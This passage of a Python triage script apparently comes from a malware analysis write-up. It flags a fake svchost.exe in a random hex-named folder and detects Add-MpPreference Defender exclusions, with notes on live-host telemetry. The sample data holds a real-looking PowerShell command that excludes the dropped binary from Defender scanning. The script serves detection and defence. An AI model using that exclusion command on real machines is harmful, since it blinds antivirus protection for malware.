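    {"path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath '
                r'"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force'},
]

# Assumption: well-known system binaries and the only directories they
# legitimately run from (compared case-insensitively).
EXPECTED_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}

# Assumption/heuristic: a directory component of 16+ letters drawn only from
# A-F, like the BABEDAFA... folder in the report, is machine-generated.
RANDOM_DIR = re.compile(r"^[A-F]{16,}$")

# Matches Add-MpPreference with a quoted or unquoted -ExclusionPath/Process/Extension value.
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))',
    re.IGNORECASE | re.DOTALL,
)


def check_masquerade(path: str) -> bool:
    """True when a well-known system binary name runs from an unexpected directory."""
    p = PureWindowsPath(path)
    expected = EXPECTED_DIRS.get(p.name.lower())
    if expected is None:
        return False
    return str(p.parent).lower() not in expected


def check_random_dir(path: str) -> bool:
    """True when any directory component (not the file name) looks machine-generated."""
    return any(RANDOM_DIR.match(part) for part in PureWindowsPath(path).parts[:-1])


def find_defender_exclusion(cmdline: str):
    """Return the value passed to Add-MpPreference -Exclusion*, or None."""
    m = EXCLUSION_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def triage(processes):
    """Run every check over the records; return a list of (path, reason) findings."""
    findings = []
    for proc in processes:
        path, cmd = proc["path"], proc["cmdline"]
        if check_masquerade(path):
            findings.append((path, "system binary name outside its expected directory"))
        if check_random_dir(path):
            findings.append((path, "random-looking directory in path"))
        excl = find_defender_exclusion(cmd)
        if excl:
            findings.append((path, f"Defender exclusion added for {excl}"))
            # Tie the exclusion back to the listed process it protects.
            for other in processes:
                if other["path"].lower() == excl.lower():
                    findings.append((other["path"], "is the target of a Defender exclusion"))
    return findings


if __name__ == "__main__":
    for path, reason in triage(REPORT_PROCESSES):
        print(f"{reason}: {path}")
```

Run against the records above this flags only the dropped `svchost.exe` (twice: wrong directory and random directory name) and the PowerShell exclusion plus its target; the legitimate `C:\Windows\System32\svchost.exe -k netsvcs -p` and the .NET framework tools pass. On a live host the same checks apply to `Get-MpPreference | Select ExclusionPath` output and to process-creation telemetry (Sysmon event 1 or Security event 4688 with command-line logging), where the `-Force` exclusion for a path under `C:\Windows` is the cheapest indicator to alert on.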

                              Disassembly

                              Code Analysis
